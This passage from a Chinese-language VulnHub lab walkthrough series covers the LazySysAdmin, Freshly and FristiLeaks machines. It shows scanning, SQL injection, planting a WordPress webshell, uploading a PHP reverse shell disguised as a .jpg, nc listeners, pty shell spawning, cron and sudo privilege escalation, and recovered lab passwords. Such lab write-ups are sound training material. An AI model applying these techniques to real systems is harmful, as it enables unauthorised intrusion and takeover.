class="cm-number">33</span>(www-data) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">/bin/sh: <span class="cm-number">0</span>: can<span class="cm-string">'t access tty; job control turned off</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ whoami</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">www-data</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ id</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">uid</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data) <span class="cm-def">gid</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data) <span class="cm-def">groups</span><span class="cm-operator">=</span><span class="cm-number">33</span>(www-data)</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ sudo</span> <span class="cm-builtin">su</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">sudo</span>: no tty present and no askpass program specified</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 376px;"></div><div class="CodeMirror-gutters" style="display: none; height: 406px;"></div></div></div></pre><p>出現no tty present and no askpass program specified，恰好目標機有python環境，使用python派生個新的shell。</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">python <span class="cm-attribute">-c</span> <span class="cm-string">'import pty; pty.spawn("/bin/sh")'</span></span></pre></div></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 31px;"></div><div class="CodeMirror-gutters" style="display: none; height: 61px;"></div></div></div></pre><p>可是不知道www-data的密碼，因此接下來就要進行提權，先來看一下目標機的詳細信息</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ uname</span> <span class="cm-attribute">-r</span></span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-number">4</span>.4.0-31-generic</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-def">$ lsb_release</span> <span class="cm-attribute">-a</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">No LSB modules are available.</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Distributor ID:<span class="cm-tab" role="presentation" cm-text="  "> </span>Ubuntu</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Description:<span class="cm-tab" role="presentation" cm-text="  ">    </span>Ubuntu <span class="cm-number">14</span>.04.5 LTS</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Release:<span class="cm-tab" role="presentation" cm-text="    ">    </span><span class="cm-number">14</span>.04</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Codename:<span class="cm-tab" role="presentation" cm-text="    ">   </span>trusty</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 196px;"></div><div class="CodeMirror-gutters" style="display: none; height: 226px;"></div></div></div></pre><p>因此用CVE-2017-1000112提權便可，可是目標機上沒有gcc，這種狀況，能夠本地搭建和目標機同樣的環境，在本地編譯好提權exp後，在目標機器上運行便可。</p><p>dirb安裝方法（kali已自帶）</p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation" style=""><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">wget</span> https://svwh.dl.sourceforge.net/project/dirb/dirb/2.22/dirb222.tar.gz</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">tar zxvf dirb222.tar.gz</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">cd</span> dirb222/</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">apt-get install libcurl4-gnutls-dev</span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">./configure && <span class="cm-builtin">make</span></span></pre><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">./dirb <span class="cm-comment">#運行便可</span></span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 146px;"></div><div class="CodeMirror-gutters" style="display: none; height: 176px;"></div></div></div></pre><p>參考連接：</p><p><a href='https://grokdesigns.com/vulnhub-walkthrough-lazysysadmin-1/'>VulnHub Walk-through – LazySysAdmin: 1</a></p><p><a href='https://uart.io/2017/12/lazysysadmin-1/'>LazySysAdmin Vulnerable Machine Walk-through</a></p><p> </p><h1><a name='header-n8486' class='md-header-anchor '></a>第六節 Freshly</h1><p> </p><h1><a name='header-n8489' class='md-header-anchor '></a>Vulnhub-TopHatSec: Freshly</h1><h2><a name='header-n8490' class='md-header-anchor '></a>靶機簡介</h2><h3><a name='header-n8491' class='md-header-anchor '></a>下載連接</h3><p><a href='https://download.vulnhub.com/tophatsec/Freshly.ova' target='_blank' class='url'>https://download.vulnhub.com/tophatsec/Freshly.ova</a></p><h3><a name='header-n8494' class='md-header-anchor '></a>運行環境</h3><ul><li>Virtualbox</li><li>VM（運行會提示錯誤，給的解決連接已經404）</li></ul><p>本靶機推薦使用Virtualbox搭建</p><h3><a name='header-n8504' class='md-header-anchor '></a>說明</h3><p>此靶機的目標是經過網絡滲透進主機，並找到隱藏在敏感文件中的祕密。</p><h3><a name='header-n8508' class='md-header-anchor '></a>運行環境</h3><p>將下載的OVA文件導入進Virtualbox便可。</p><h2><a name='header-n8511' class='md-header-anchor '></a>滲透思路</h2><h3><a name='header-n8512' class='md-header-anchor '></a>服務發現</h3><p>端口掃描</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>操做系統識別</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_2.jpg' alt='' referrerPolicy='no-referrer' /></p><p>主要端口進一步掃描</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_3.jpg' alt='' referrerPolicy='no-referrer' /></p><p>80端口</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>8080</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現8080和443端口均爲Web，使用了WordPress。</p><h3><a name='header-n8535' class='md-header-anchor '></a>檢測已知服務</h3><p>對wordpress進行掃描</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現三個插件有安全問題，可是對進一步滲透幫助不大。在掃描同時，使用<code>nikto</code>對80進行目錄掃描，發現phpmyadmin和login.php</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>login.php</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>Sqlmap進行檢測</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>存在注入</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看數據庫</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_11.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看WordPress8080庫找到wordpress的用戶名和密碼</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>登入後臺，修改語言爲中文</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_14.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8570' class='md-header-anchor '></a>獲取shell</h3><p>wordpress有兩種方式拿shell，一種是添加插件，將準備好的格式正確的shell添加到.zip上傳。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>還有一種是直接編輯</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>這裏採用直接編輯的方式getshell。將shell寫入404頁面</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>本地開NC監聽</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>訪問404頁面
Shell反彈</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看passwd</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_20.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/freshly_21.jpg' alt='' referrerPolicy='no-referrer' /></p><h1><a name='header-n8599' class='md-header-anchor '></a>第七節 FristiLeaks v1.3</h1><h2><a name='header-n8600' class='md-header-anchor '></a>靶機信息</h2><h3><a name='header-n8601' class='md-header-anchor '></a>下載鏈接</h3><p><a href='https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent' target='_blank' class='url'>https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova.torrent</a> 
<a href='https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova' target='_blank' class='url'>https://download.vulnhub.com/fristileaks/FristiLeaks_1.3.ova</a></p><h3><a name='header-n8605' class='md-header-anchor '></a>運行環境</h3><ul><li>Virtualbox （二選一)</li><li>Vnware Workstation player</li></ul><h3><a name='header-n8613' class='md-header-anchor '></a>設置</h3><p>根據官網提供的說明，首先要將要求設置VMware虛擬機的MAC地址 08:00:27:A5:A6:76 
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_1.jpg' alt='' referrerPolicy='no-referrer' /></p><p>而後開啓VM</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_2.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8621' class='md-header-anchor '></a>主機發現</h3><p><code>Netdiscover –r 10.10.10.0/24</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_3.jpg' alt='' referrerPolicy='no-referrer' /><br/></p><p>能夠發現目標主機在10.10.10.132的位置</p><h3><a name='header-n8628' class='md-header-anchor '></a>服務發現</h3><p><code>nmap -sS -Pn -T4 -p- 10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_4.jpg' alt='' referrerPolicy='no-referrer' /></p><p>能夠看到打開了80端口，service爲HTTP</p><h3><a name='header-n8635' class='md-header-anchor '></a>詳細掃描80端口</h3><p>僅發現開放了80端口，對80端口進行詳細探測：</p><p><code>nmap -A -O -p80 10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_5.jpg' alt='' referrerPolicy='no-referrer' /></p><p>獲得如下有價值的信息：</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">Apache httpd 2.2.15 ((CentOS) DAV/2 PHP/5.3.3)</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">http-robots.txt: 3 disallowed entries</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>瀏覽一下web站點</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_6.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據nmap掃描的結果存在<code>robots.txt</code>文件，查看一下：</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_7.jpg' alt='' referrerPolicy='no-referrer' /></p><p>訪問如下<code>robots.txt</code>提到的三個路徑</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_8.jpg' alt='' referrerPolicy='no-referrer' /></p><p>三個目錄內容相同，只有以上畫面。</p><p>接着，枚舉一下目錄：</p><p><code>dirb http://10.10.10.132</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_9.jpg' alt='' referrerPolicy='no-referrer' /></p><p>在<code>images</code>目錄發現幾張照片：</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_10.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看圖片，<code>keep-calm</code>彷佛是一個提示</p><p>KEEP CALM AND DRINK FRISTI</p><p>嘗試訪問 <a href='http://10.10.10.132/fristi' target='_blank' class='url'>http://10.10.10.132/fristi</a>/</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_11.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現一個登錄口。登陸界面存在一個嚴重安全問題，兩個輸入框都有自動完成的功能。（包括密碼）
   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_12.jpg' alt='' referrerPolicy='no-referrer' /></p><p>掃描一下該目錄：</p><p><code>dirb http://10.10.10.132/fristi/</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_13.jpg' alt='' referrerPolicy='no-referrer' /></p><p>發現了<code>upload</code>目錄的index頁面</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_14.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看源代碼發現線索：</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_15.jpg' alt='' referrerPolicy='no-referrer' /></p><p>註釋當中的信息代表，此頁面是一個叫eezeepz的人留下來的。</p><p>推測，<code>eezeepz</code>或許是帳號或者密碼</p><p>繼續向下，發現一大塊用base64編碼的字符串</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_16.jpg' alt='' referrerPolicy='no-referrer' /></p><p>複製，寫入一個文件，以後使用命令解碼：</p><p><code>base64 -d /tmp/encoded.txt</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_17.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據文件格式，這是一個PNG格式的圖畫，保存爲PNG格式</p><p><code>base64 -d /tmp/encoded.txt > decoded.png</code></p><p>查看發現一串字符串</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_18.jpg' alt='' referrerPolicy='no-referrer' /></p><p>嘗試使用以上獲取的信息進行登陸：</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">username:eezeepz</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">password:keKkeKKeKKeKkEkkEk</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_19.jpg' alt='' referrerPolicy='no-referrer' /></p><p>登錄成功，發現文件上傳。此上傳點未作任何過濾，能夠直接上傳shell文件。</p><p>反彈Shell的腳本木馬能夠在這裏下載：<a href='http://pentestmonkey.net/tools/web-shells/php-reverse-shell' target='_blank' class='url'>http://pentestmonkey.net/tools/web-shells/php-reverse-shell</a></p><pre class="md-fences md-end-block" lang="bash"> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">cp</span> /usr/share/webshells/php/php-reverse-shell.php reverse-shell.php</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;"><span class="cm-builtin">vi</span> reverse-shell.php</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>修改反彈shell的ip地址和監聽端口。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_20.jpg' alt='' referrerPolicy='no-referrer' /></p><p>使用<code>nc</code>監聽端口：</p><p><code>nc -nlvp 8888</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_21.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>根據回顯，只有png, jpg, gif 能上傳</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_22.jpg' alt='' referrerPolicy='no-referrer' /></p><p>修改一下文件名，後綴加上<code>.jpg</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_23.jpg' alt='' referrerPolicy='no-referrer' />
   <br/>
上傳成功，打開上傳的shell：
   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_24.jpg' alt='' referrerPolicy='no-referrer' /></p><p>如今已經獲得了一個低端權限
   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_25.jpg' alt='' referrerPolicy='no-referrer' /></p><h3><a name='header-n8754' class='md-header-anchor '></a>權限提高</h3><p>翻看一下目錄，在<code>home</code>目錄</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_27.jpg' alt='' referrerPolicy='no-referrer' />
   <br/>
看到關鍵人物eezeepz的家目錄</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_28.jpg' alt='' referrerPolicy='no-referrer' /></p><p>在<code>notes.txt</code>當中獲得提示：
   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_29.jpg' alt='' referrerPolicy='no-referrer' /></p><p>根據提示說明，在/tmp下建立一個<code>runtis</code>文件</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_30.jpg' alt='' referrerPolicy='no-referrer' />
   <br/></p><h3><a name='header-n8772' class='md-header-anchor '></a>賦予權限</h3><p>根據<code>notes.txt</code>的提示，在<code>/tmp/runtis</code>當中寫入的命令會定時執行，那麼，修改<code>/home/admin</code>目錄的權限。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_31.jpg' alt='' referrerPolicy='no-referrer' />
   <br/>
等待系統執行命令以後，就能夠閱讀 <code>/home/admin</code> 下的內容了</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_32.jpg' alt='' referrerPolicy='no-referrer' /></p><p>有幾個文件。依次看一下。</p><p>cryptpass.py</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_33.jpg' alt='' referrerPolicy='no-referrer' /> 
Cryptepass.txt
  <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_34.jpg' alt='' referrerPolicy='no-referrer' /> 
whoisyourgodnow.txt</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_35.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>看樣子應該是用了py文件去加密的。
重寫一下文件：
   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_36.jpg' alt='' referrerPolicy='no-referrer' /></p><p>解密試試
   <br/>
<img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_37.jpg' alt='' referrerPolicy='no-referrer' /></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_38.jpg' alt='' referrerPolicy='no-referrer' />
   <br/>
分別獲得</p><pre class="md-fences md-end-block" lang=""> <div class="CodeMirror cm-s-inner CodeMirror-wrap"><div style="overflow: hidden; position: relative; width: 3px; height: 0px; top: 4px; left: 4px;"></div><div class="CodeMirror-scrollbar-filler" cm-not-content="true"></div><div class="CodeMirror-gutter-filler" cm-not-content="true"></div><div class="CodeMirror-scroll" tabindex="-1"><div class="CodeMirror-sizer" style="margin-left: 0px; margin-bottom: 0px; border-right-width: 30px; padding-right: 0px; padding-bottom: 0px;"><div style="position: relative; top: 0px;"><div class="CodeMirror-lines" role="presentation"><div role="presentation" style="position: relative; outline: none;"><div class="CodeMirror-measure"><pre><span>xxxxxxxxxx</span></pre></div><div class="CodeMirror-measure"></div><div style="position: relative; z-index: 1;"></div><div class="CodeMirror-code" role="presentation"><div class="CodeMirror-activeline" style="position: relative;"><div class="CodeMirror-activeline-background CodeMirror-linebackground"></div><div class="CodeMirror-gutter-background CodeMirror-activeline-gutter" style="left: 0px; width: 0px;"></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">1.mVGZ3O3omkJLmy2pcuTq  ：thisisalsopw123</span></pre></div><pre class=" CodeMirror-line " role="presentation"><span role="presentation" style="padding-right: 0.1px;">2.=RFn0AKnlMHMPIzpyuTI0ITG ：LetThereBeFristi!</span></pre></div></div></div></div></div><div style="position: absolute; height: 30px; width: 1px; border-bottom: 0px solid transparent; top: 54px;"></div><div class="CodeMirror-gutters" style="display: none; height: 84px;"></div></div></div></pre><p>這有多是用戶fristgod 的密碼，組合試試</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_39.jpg' alt='' referrerPolicy='no-referrer' />
   <br/>
根據報錯信息，查了資料：
跟 su 命令的實現有關； B環境上su的實現應該是判斷標準輸入是否是tty ； 而A環境上su的實現則容許從其餘文件讀取密碼。</p><p>解決方法以下：</p><p><code>Python -c 'import pty;pty.spawn("/bin/sh")'</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_40.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>接下來就能夠正常使用了。</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_41.jpg' alt='' referrerPolicy='no-referrer' />
      <br/>
查看一下目錄文件：</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_43.jpg' alt='' referrerPolicy='no-referrer' /></p><p>查看<code>.secret_admin_stuff</code>目錄文件：</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_45.jpg' alt='' referrerPolicy='no-referrer' />
    
發現這個是個root的文件
權限應該是不夠的</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_46.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>查看命令使用記錄，<code>history</code>命令執行結果：</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_47.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>能夠看到<code>fristigod</code>用戶一直sudo來執行命令</p><p>嘗試輸入以前獲得的兩個密碼：</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_50.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>成功登錄：</p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_51.jpg' alt='' referrerPolicy='no-referrer' /> </p><p>使用<code>sudo</code>提高權限，並建立一個shell：</p><p><code>sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash</code></p><p><img src='https://raw.githubusercontent.com/lifeand/pic/master/ctf2_52.jpg' alt='' referrerPolicy='no-referrer' />
    
